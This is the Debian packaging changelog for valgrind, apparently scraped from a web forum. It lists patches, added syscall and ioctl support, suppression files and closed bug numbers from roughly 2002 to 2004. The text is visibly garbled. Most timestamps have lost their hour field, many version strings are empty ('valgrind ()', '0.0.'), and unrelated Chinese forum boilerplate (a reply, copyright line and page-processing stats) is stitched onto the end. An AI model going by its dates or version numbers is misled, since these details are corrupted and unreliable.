* debian/patches/19_pthread_attr_getinheritsched.dpatch:
- Adds a dummy implementation of pthread_attr_getinheritsched.
* debian/patches/20_pthread_condattr_getsetpshared.dpatch:
- Adds a dummy implementation of pthread_condattr_getpshared and
pthread_condattr_setpshared.
* debian/valgrind.default:
- Removed. Useless file that nobody uses. (Closes: #279705)
* debian/debian.supp:
- Appended python suppression file provided by python's maintainer.
* debian/control:
- Suggests valgrind-callgrind instead of valgrind-calltree.
(Closes: #278621)
* debian/valgrind.sh:
- Some cosmetic changes.
-- Andrés Roldán
Tue, 16 Nov :04 +0000
valgrind (1:2.2.0-3) urgency=low
* debian/patches/01_cachegrind.dpatch:
- Cope with arguments over 510 characters in length when writing the
cachegrind output file.
* debian/patches/02_cachegrinderrno.dpatch:
- This patch makes cachegrind report the reason why it was unable to open
the output file.
* debian/patches/15_pthread_mutexattr_gettype.dpatch:
- Implements pthread_mutexattr_gettype().
* debian/patches/16_pthread_mutex_lock.dpatch:
- Warns about a possible deadlock on thread.
* debian/patches/17_statvfs64.dpatch:
- Fixed the statfs64 wrapper to look at the right argument for the stat
buffer and added an fstatfs64 wrapper.
* debian/valgrind.sh:
- Adds /usr/X11R6/lib/debug to LD_LIBRARY_PATH. (closes: #274972)
-- Andrés Roldán
Thu, 14 Oct :43 +0000
valgrind (1:2.2.0-2) urgency=medium
* debian/patches/13_sched_setaffinity-getaffinity.dpatch:
- Adds support for sched_setaffinity() and sched_getaffinity() syscalls.
* debian/patches/14_ioctls.dpatch:
- Adds support for the following ioctls:
+ TIOCMBIS.
+ TIOCMBIC.
+ SG_EMULATED_HOST.
+ SG_GET_SG_TABLESIZE.
+ CDROMMULTISESSION.
+ CDROMVOLREAD.
+ CDROMREADAUDIO.
-- Andrés Roldán
Fri, 10 Sep :45 +0000
valgrind (1:2.2.0-1) urgency=low
* New stable release. (closes: #234030)
* Updated patches according to this new version.
* Removed some patches already on upstream source.
* Make debian.supp the default suppression file for Debian.
-- Andrés Roldán
1 Sep :33 +0000
valgrind (1:2.1.2-3) urgency=low
* debian/patches/01_libpthread.dpatch:
- Patch to improving the logic in valgrind's libpthread that handles
looking for functions in libc to forward to. If you have assertions
like &Assertion `open_ptr != ((void *)0)&, you may love this patch.
* debian/patches/01_memcpy.dpatch:
- Patch to remove warning when passing an uninitialized pointer to memcpy
when length to copy is zero.
* debian/patches/02_si_addr-SIGFPE.dpatch:
- This patch should make valgrind fixup si_addr in the siginfo structure
when SIGFPE is received so that it points at the right instruction.
-- Andrés Roldán
Thu, 26 Aug :34 +0000
valgrind (1:2.1.2-2) urgency=low
* debian/patches/01_sfence.dpatch: New. Move the decoding of SFENCE out of
the SSE only part of disInstr.
* debian/patches/01_ssort.dpatch: New. ssort() failed when signed int return
type from comparison is too small to handle result of unsigned int
subtraction.
* debian/patches/02_sbbl.dpatch: New. gcc sometimes generates &sbbl
%reg,%reg& to convert the carry flag into 0 or -1 in reg.
This has no
actual dependency on reg, but memcheck can't see that, and so will help
if reg contains garbage.
* debian/valgrind.1:
+ s/--logfile-fd/--log-fd/
+ s/--logfile/--log-file/
+ s/--logsocket/--log-socket/
-- Andrés Roldán
8 Aug :08 +0000
valgrind (1:2.1.2-1) urgency=low
* New upstream release. (See changelog) (closes: #248887, #258652)
* Removed the following patches (already on upstream's package):
- 01_hp2ps
- 13_detailed_types
- 14_db-attach
- 15_async_io_syscalls.dpatch
- 16_hdio_get_identity
- 17_siocgmiiphy-siocgmiireg
* Update the following patches:
- 01_configure.dpatch
- 01_vgPlain_do_syscall.dpatch
- 11_exitcode.dpatch
- 01_ipc_stuff.dpatch
- 10_ansi-vg.dpatch
- 12_readdir.dpatch
* debian/patches/01_gettid.dpatch: New. Should closes: #238925
-- Andrés Roldán
Tue, 20 Jul :16 +0000
valgrind (1:2.1.1-4) urgency=low
* debian/valgrind.sh:
- Quoted VALGRIND_OPTS to avoid conflicts with multiple pre-defined
options. (closes: #245241)
* debian/valgrind.1:
- Documented gen-suppressions option. (closes: #243734)
- sed -e 's/Valgrind/\\fIvalgrind\\fP/g' valgrind.1
* debian/patches/15_async_io_syscalls.dpatch:
- New. Adds support for asyncronous io syscalls.
* debian/patches/16_hdio_get_identity.dpatch:
- New. Addes support for HDIO_GET_IDENTITY syscall.
* debian/patches/17_siocgmiiphy-siocgmiireg.dpatch:
- New. Adds support SIOCGMIIPHY and SIOCGMIIREG.
-- Andrés Roldán
Sun, 20 Jun :22 -0500
valgrind (1:2.1.1-3) urgency=low
* debian/valgrind.1: Updated.
- Added --track-fds description.
- Added lax-ioctls weird hack description.
- Added --db-attach description.
- Added --db-command description.
- Added --tool description.
- Removed --gdb-attach description.
- sed -e 's/skins/tools/g'
- (closes: #241678, #241329)
* debian/patches/14_db-attach.dpatch: New. Makes --db-attach=yes work again.
(closes: #241676)
* debian/patches/01_hp2ps.dpatch: New. Solves problem of massif creating
PostScript(R) files.
-- Andrés Roldán
8 Apr :07 -0500
valgrind (1:2.1.1-2) urgency=medium
* debian/control:
sed -ne '/^Description:/,//p' control | sed -e 's/skins/tools/g'
* debian/patches/12_readdir.dpatch: New. Add support for readdir syscall.
(closes: #237996)
* debian/patches/11_exitcode.dpatch: Upgraded. Now --version exits with 0
too. (closes: #238048)
* debian/patches/13_detailed_types.dpatch: New. Adds support for
--detailed-types option which extract detailed type info from debug
-- Andrés Roldán
Fri, 19 Mar :46 -0500
valgrind (1:2.1.1-1) urgency=low
* New upstream version.
- This version contains some internal structural changes needed for
valgrind's long-term future.
These don't affect end-users.
It closes: #230785, #221413
- Greater isolation between Valgrind and the program being run, so
the program is less likely to inadvertently kill Valgrind by doing
wild writes.
- Massif: a new space profiling tool. It will tell you in detail where
and when your C/C++ code is allocating heap.
Draws pretty .ps pictures of memory use against time. A potentially
powerful tool for making sense of your program's space use.
- Fixes for many bugs, including support for more SSE2/SSE3 instructions,
various signal/syscall things, and various problems with debug info
readers. (closes: #221659)
- glibc 2.3.2 w/NPTL is massively different than what valgrind expects.
- It now fully supports sysinfo page in 2.6 kernels.
(closes: #217736, #227894, #229706, #230198)
* The following patches has been updated:
12_ipc_stuff.dpatch renamed to 01_ipc_stuff.dpatch.
07_more_sem.dpatch renamed to 01_more_sem.dpatch.
10_ansi-vg.dpatch.
11_exitcode.dpatch.
* The following patches has been removed. They are already on the
upstream package:
10_vg_stabs2.dpatch.
01_vg_symtab2.c.dpatch.
09_vg_stabs.dpatch.
10_epoll.dpatch.
* The following patches has been removed. They are useless or deprecated:
01_include-Makefile.am.dpatch.
01_include-Makefile.in.dpatch.
01_watchpoints.dpatch.
06_vg_include.h.dpatch.
10_timestamp.dpatch.
02_stack_addresses.dpatch.
* debian/valgrind.doc: Removed PATCHES_APPLIED from the list.
* debian/valgrind.default: Updated. Now you can especify valgrind options
with VALGRIND_OPTS enviroment variable instead of VGOPTS.
* debian/overrides: Added some overrides.
* debian/valgrind.sh: Updated. Removed LD_ASSUME_KERNEL variable. Now it
should handle things well. Besides, it will use memcheck as the default as
now valgrind does not assume a default tool to use.
-- Andrés Roldán
Sat, 13 Mar :15 +0000
valgrind (1:2.1.0-9) urgency=low
* debian/patches/12_ipc_stuff.dpatch: New. Adds wrap of struct ipc_kludge to
solve FTBFS bug. (closes: #236402)
* debian/control: Build-Depends on dpatch (&& 2.0.0). (closes: #237214)
-- Andrés Roldán
Wed, 10 Mar :24 +0000
valgrind (1:2.1.0-8) urgency=low
* Fix build failures on woody. Thanks to David Kimdon. (closes: #233498)
* Now --help and --version exits with code 0. (closes: #234368)
-- Andrés Roldán
2 Mar :06 +0000
valgrind (1:2.1.0-7) urgency=low
* Improved watchpoint patch. Thanks again to Robert Walsh
* Added patch to add the --stack-addresses option which is used to show (or
not show) the addresses in the stack trace output.
* Added patch that lets GDB backtrace through vgPlain_do_syscall. Thanks to
Daniel Jacobowitz . (closes: #225475)
-- Andrés Roldán
Mon, 16 Feb :42 +0000
valgrind (1:2.1.0-6) urgency=low
* Fixes bug generated by gcc which generates negatively-sized scopes and out
of order line number information in the stabs debug info.
Really fixes Bug#231093.
-- Andrés Roldán
Wed, 11 Feb :04 +0000
valgrind (1:2.1.0-5) urgency=low
* Added support for epoll(4) syscalls, a variant of poll(2). This API is
meaningful just for 2.5 and higher kernels.
* Upgraded copyright file. The upstream URL has changed and it was not UTF-8
* Added patch to support the --watchpoint option which allows the
application to set a watchpoint on a memory location. See README.Debian
for more information. Thanks to Robert Walsh .
* Added glib suppression sent by David Schleef .
(closes: #231989)
* Added patch to make the valgrind.h compile with strict ANSI gcc options.
(closes: #231604)
-- Andrés Roldán
Tue, 10 Feb :25 +0000
valgrind (1:2.1.0-4) urgency=low
* Added patch that fixes segfault with Objective-C debug info.
(closes: #229925)
* Added anothers suppressions to mitigate the error output due to missing
syscall page support for 2.6 kernels.
-- Andrés Roldán
4 Feb :02 +0000
valgrind (1:2.1.0-3) urgency=medium
* Applied patch to handle volatile qualifiers with stabs. The former patch
just applied the const qualifiers patch.
-- Andrés Roldán
1 Feb :46 +0000
valgrind (1:2.1.0-2) urgency=low
* Added patch to handle volatile and const qualifiers with stabs.
(closes: #226217)
* Added patch to show a timestamp in the output with the --time-stamp
* Added $(MAKE) regtest to check valgrind when it's building.
-- Andrés Roldán
5 Jan :44 +0000
valgrind (1:2.1.0-1) urgency=low
* New upstream version.
- Removed the following patches (already included in main source):
02_valgrind-2.6-headers-fixes
03_vg_main.c
04_vg_syscalls.c
05_vg_replace_malloc.c
07_gettid_syscall
07_lfence_mfence
- Now blocking syscalls behave behave exactly as they do when running
natively (not in valgrind). Hopefully closes: #166514
- Added support for file descriptors leakage checks (--track-fds=yes).
When enabled, valgrind will print out a list of open file descriptors
* Increased the number of semaphores supported. (closes: #221745)
-- Andrés Roldán
Wed, 17 Dec :06 +0000
valgrind (1:2.0.0-4) urgency=low
* Added new glibc suppressions.
* Added stolen from head patch that implements
__NR_gettid (syscall 224).
* Added stolen from head patch to support LFENCE and MFENCE.
* Added stolen from head patch to implement SCAS.
* Removed potato suppressions.
* Updated sarge suppressions.
-- Andrés Roldán
6 Dec :13 +0000
valgrind (1:2.0.0-3) urgency=low
* Renamed debian/patches files to the XX_name.dpatch scheme.
* Included patch from Jim Meyering to support __NR_statfs64 (syscall 268)
and __NR_utimes (syscall 271) syscalls.
* Added patch to support posix_memalign function.
* Increased the line error message. Useful when your code has long lines.
* Improved 03_vg_main.c.dpatch. Hopefully closes: #206917
-- Andrés Roldán
Mon, 17 Nov :02 +0000
valgrind (1:2.0.0-2) urgency=low
* Build-depends and Recommends gdb. When configuring, it tries to determine
where is gdb and if it's not installed, --gdb-attach will not work.
(closes: #220729)
-- Andrés Roldán
Fri, 14 Nov :52 +0000
valgrind (1:2.0.0-1) urgency=low
* New upstream version.
- Removed patches to allow valgrind compile under kernel 2.6. It is
already on the valgrind upstream source.
- Removed compilation with profile support.
- Removed patch that solved unhandled instruction bytes problem. It is
already on the valgrind upstream source.
- Removed patch that solved the stack corruption on valgrind. It is
already on the valgrind upstream source.
-- Andrés Roldán
Thu, 13 Nov :21 +0000
valgrind () urgency=low
* I didn't want this but even the upstream has not a better solution.
It has been added LD_ASSUME_KERNEL=2.4.1 to the valgrind wrapper to solve
all the bugs related to NPTL at the moment in valgrind. Really fix #218611
and closes: #220161, #218609
-- Andrés Roldán
Tue, 11 Nov :28 +0000
valgrind () urgency=low
* Compiled with the latest libc6 (2.3.2.ds1-10) that added a patch to
disable NPTL for programs that call the old errno. If this bug is
still appearing on you, you may as well upgrade to libc6-2.3.2.ds1-10
or newer. (closes: #218611)
* Updated README.Debian. Read it please.
-- Andrés Roldán
8 Nov :09 +0000
valgrind () urgency=low
* Added patch sent from Andrew Moise that solves the bugs arised with
the latest libc6. Thanks to him. (closes: #218611, #218629, #218636)
-- Andrés Roldán
3 Nov :57 +0000
valgrind () urgency=low
* Added patch that solves the unhandled instruction bytes bug found on
-- Andrés Roldán
Mon, 20 Oct :08 +0000
valgrind () urgency=low
* Removed suggestion of valgrind-headers. (closes: #215262)
* Added patch that solves the not-ever-reported bug of stack corruption on
-- Andrés Roldán
Thu, 16 Oct :22 +0000
valgrind () urgency=low
* New upstream version.
-- Andrés Roldán
Wed, 15 Oct :02 +0000
valgrind () urgency=low
* Put together again all the package. I know, that was a bad idea.
* Added vg_profile.c to includes.
-- Andrés Roldán
Fri, 10 Oct :26 +0000
valgrind () urgency=low
* At last, there has been included a full valgrind manpage written by me.
(closes: #166561)
-- Andrés Roldán
2 Oct :29 +0000
valgrind () urgency=low
* The &I'm feeling smart today (am I?)& release.
* Changed maintainer's e-mail.
* Bumped Standards-Version to 3.6.1.
* Splitted into two packages: valgrind-headers (Headers only needed to
create new skins) and valgrind (the core package).
* Included &vg_profile.c& to some skins (cachegrind, corecheck, lackey and
none) to make them support profiling.
* Updated debian/README.Debian and debian/copyright.
-- Andrés Roldán
Sun, 28 Sep :04 -0500
valgrind () urgency=low
* Added new XFree86 suppression to sid.supp.
* Removed useless build-depend on sharutils.
-- Andrés Roldán
Sun, 14 Sep :48 +0000
valgrind () urgency=low
* Now it really compiles on 2.6 kernels. (closes: #208142)
-- Andrés Roldán
3 Sep :00 +0000
valgrind () urgency=low
* Changed the valgrind wrapper. It didn't work when it was using libraries
on a non-standard location. (Thanks Jason :). (closes: #207771)
* Added patch to support compilation for 2.6 kernels (closes: #208142)
-- Andrés Roldán
1 Sep :59 +0000
valgrind () urgency=low
* Added suggestion to use libc6-dbg which shows pretty important debugging
information.
* Added wrapper to use libc6-dbg if it's installed.
* Added sid.supp to work with the newest libc6 version.
* Built with newer libc6.
* Added patch to support waitpid syscall. (closes: #206366)
-- Andrés Roldán
Wed, 20 Aug :37 +0000
valgrind () urgency=low
* New upstream version taken from cvs head. Fixes some minor bugs.
* Fixed debian-specific suppressions errors. (closes: #202126)
-- Andrés Roldán
Tue, 29 Jul :08 +0000
valgrind () urgency=low
* New upstream version taken from cvs head. (closes: #188155)
* Add suggestion to use valgrind-calltree which is needed to make a good use
of kcachegrind (closes: #193169)
* Bumped Standard-Version to 3.6.0. Changelog and control is now UTF-8
* Updated long description.
-- Andrés Roldán
Fri, 18 Jul :19 +0000
valgrind (1.9.6-1) urgency=low
* New upstream version.
* Removed the patch from Anders Gustafsson since it is already on the
upstream source.
* Added FAQ.txt to documentation (please read it).
* Changed default suppresion to sarge.supp. I left woody.supp and
potato.supp for compatibility.
* Added a stolen-from-HEAD patch from Crispin Flowerday that closes all the
opened file descriptors when the work is done.
* Added a stolen-from-HEAD patch from Jeffrey Stedfast to avoid confussion
when the number of the suppression callers is &= VG_N_SUPP_CALLERS.
* Added a stolen-from-HEAD patch from Troels Walsted Hansen that allows reuse
of the socket.
-- Andrés Roldán
Sat, 10 May :36 +0000
valgrind (1.9.5-2) urgency=low
* Change index.html to manual.html in doc-base (closes: #189749, #190180)
* Fixed some minor typo issues.
* Added some overrides of some unstripped share objects.
* valgrind --help now goes to stdout (closes: #189657)
* Applied patch from Anders Gustafsson to make valgrind usable for
linux-2.5.68. (closes: #191347)
-- Andrés Roldán
Sat, 28 Apr :10 +0000
valgrind (1.9.5-1) urgency=low
* New maintainer.
* Began to use the devel branch of valgrind as the default version.
See README.Debian.
(closes: #166514, #179248, #186924, #179114)
* Bumped up Standard-Version according to latest Debian Policy.
-- Andrés Roldán
Wed, 16 Apr :26 +0000
valgrind (1.0.4-2.2) urgency=low
* Non-maintainer upload.
* Patched to support __NR_exit_group syscall.
Requires compilation
against a kernel with __NR_exit_group defined.
Closes: #179581.
* Remove configure generated files.
* Add a trailing new line to debian/docs, to quiet dpkg-source.
* Remove dh_testroot call from clean target in rules.
Closes: #174263.
* Fix the config.sub/config.guess out of date problem, by depending on
autotools-dev.
* Remove call to dh_undocumented.
* Remove debian/conffiles, as this is done automatically now.
* Fix boilerplate text in debian/copyright, which was from dh_make.
* Mostly lintian clean.
All that is left is to write some manpages.
-- Adam Heath
7 Feb :59 -0600
valgrind (1.0.4-2.1) urgency=low
* Non-maintainer upload.
* Rebuilt to work with current glibc (closes: #173918).
-- Robert Bihlmeyer
Thu, 26 Dec :58 +0100
valgrind (1.0.4-2) urgency=low
* removed the conflicts: against libc6 2.3 -- upstream 1.0.4 is happy with
that libc now (Closes: #165361)
-- Cyrille Chepelov
Wed, 23 Oct :04 +0200
valgrind (1.0.4-1) urgency=low
* New upstream release
* Added a conflicts: against libc6 2.3 until I can investigate more. If
things go well, -2 should lift this restriction.
* Includes the Call Tree patch-0.2b-valgrind-1.0.4.gz from Josef Weindorfer
* Includes the ValGui support patch vg104-after-ct0.2b.diff from Eric
Estievenart.
* added FAQ.txt to the docs
-- Cyrille Chepelov
Mon, 21 Oct :42 +0200
valgrind (1.0.3-2) urgency=low
* added an experimental patch from upstream,
valgrind-1.0.3-gcc3.1-and-above-patch1.txt. This should help reducing
the amount of noise when compiling with gcc3.1 and above.
-- Cyrille Chepelov
Tue, 24 Sep :00 +0200
valgrind (1.0.3-1) urgency=low
* New upstream release (Closes: #160469)
* added a &suggests& on kcachegrind
* Includes the Call Tree patch-0.2a-valgrind-1.0.2.gz from Josef Weindorfer,
to improve compatibility with kcachegrind (Closes: #161208)
-- Cyrille Chepelov
Thu, 19 Sep :50 +0200
valgrind (1.0.1-2) urgency=low
* Add forgotten upstream ChangeLog (Closes: #159333)
-- Cyrille Chepelov
2 Sep :25 +0200
valgrind (1.0.1-1) urgency=low
* New upstream release (Closes: #154921)
* added CURRENT_BUG_STATUS to the doc directory.
* Using the same maintainer address for all packages, sheesh!
-- Cyrille Chepelov
Wed, 28 Aug :30 +0200
valgrind (1.0.0-1) urgency=low
* New upstream release (Closes: #154394)
-- Cyrille Chepelov
Sat, 27 Jul :14 +0200
valgrind (1.0pre6-1) urgency=low
* New upstream release
-- Cyrille Chepelov
Sun, 21 Jul :16 +0200
valgrind (1.0pre2-2) urgency=low
* removed call to dh_strip, at upstream's request
* Added an override against unstripped-binary-or-object, after shaleh gave
green light.
-- Cyrille Chepelov
Fri, 21 Jun :24 +0200
valgrind (1.0pre2-1) urgency=low
* New upstream release. Should hopefully close #150588.
* installs file valgrind.h into /usr/include
(Closes: #147718). In
fact, install now uses 'make install' which has been available for a
-- Cyrille Chepelov
Fri, 21 Jun :54 +0200
valgrind (0.0.) urgency=low
* New upstream release. Should close #145554; waiting for feedback
before closing this bug.
-- Cyrille Chepelov
Sat, 11 May :51 +0200
valgrind (0.0.) urgency=low
* Added a &local& suppressions file in the default conffile (Closes
#145691 a more complete way without code-level changes).
-- Cyrille Chepelov
5 May :57 +0200
valgrind (0.0.) urgency=low
* New upstream release. This one fixes a major bug from the last two
snapshot packages ( and ).
* added forgotten new binary libpthead.so (Closes: #145738)
* Added a note in README.Debian about problems with running kernel 2.2
with a binary built using kernel 2.4 (see #145554, which is not fixed yet).
* Added a suppression for &ls -l& (Closes: 145727) and added a
&debian.supp& temporary suppressions file. These suppressions should
all be temporary, until upstream merges them.
* Added a file, /etc/default/valgrind, which allows you to tweak
default options for val in particular, the
default suppressions file. (Closes: #145691)
* Updated the control file to reflect the new features (libpthread,
cachegrind)
-- Cyrille Chepelov
5 May :20 +0200
valgrind (0.0.) urgency=low
* New upstream release
* Fixed description grammar/typography (Closes: #145311)
* Fixed suppressions file generation. Now the package ships with &woody&
and &potato& suppressions files (unconditionally uses &woody.supp& by
default). (Closes: #145445)
* Added a hint in README.Debian about the possibility to use the
debugging libc6.
-- Cyrille Chepelov
2 May :35 +0200
valgrind (0.0.) urgency=low
* New upstream release
* This package now works only with glibc-2.2 (upstream also supports
glibc-2.1)
-- Cyrille Chepelov
Tue, 30 Apr :04 +0200
valgrind (0.0.) urgency=low
* debian/control: added a build-dependency against glibc-2.2 (prevents
attempt previous libc6-dev lacked a #define
IPC_64 in linux/ipc.h). This again suggested by Cristian Ionescu-Idbohrn.
* Reviewed the upgrading checklist, and bumped up the Standards-Version
accordingly.
-- Cyrille Chepelov
6 Apr :53 +0200
valgrind (0.0.) urgency=low
* debian/rules: better cleaned up ./configure-generated files (used
distclean rather than clean).
* valgrind.1: removed a small inconsistency in the parameter
documentation.
Both these issues were reported by Cristian Ionescu-Idbohrn
-- Cyrille Chepelov
6 Apr :07 +0200
valgrind (0.0.) urgency=low
* New upstream release
* This time hopefully I won't re-upload a previously-rejected version.
-- Cyrille Chepelov
6 Apr :44 +0200
valgrind (0.0.) urgency=low
* New upstream version.
* Fixed copyright file, which was lacking a mention of the GPL (oops).
* added the README_MISSING_SYSCALL_OR_IOCTL docfile.
-- Cyrille Chepelov
Thu, 21 Mar :21 +0100
valgrind (0.0.) urgency=low
* Updated description to reflect the fact that funky instruction and
clone() are still unsupported. (Closes a comment from Joe Buck
-- Cyrille Chepelov
Wed, 27 Feb :50 +0100
valgrind (0.0.) urgency=low
* New upstream release
-- Cyrille Chepelov
Tue, 26 Feb :01 +0100
valgrind (0.0.) urgency=low
* Initial Release (closes: #135718)
-- Cyrille Chepelov
Mon, 25 Feb :46 +0100
说的太好了,我顶!
Copyright & 2014
Corporation, All Rights Reserved
Processed in 0.6629 second(s), 2 db_queries,
1 rpc_queries

我要回帖

更多关于 我让你走了 鹿晗 的文章

 

随机推荐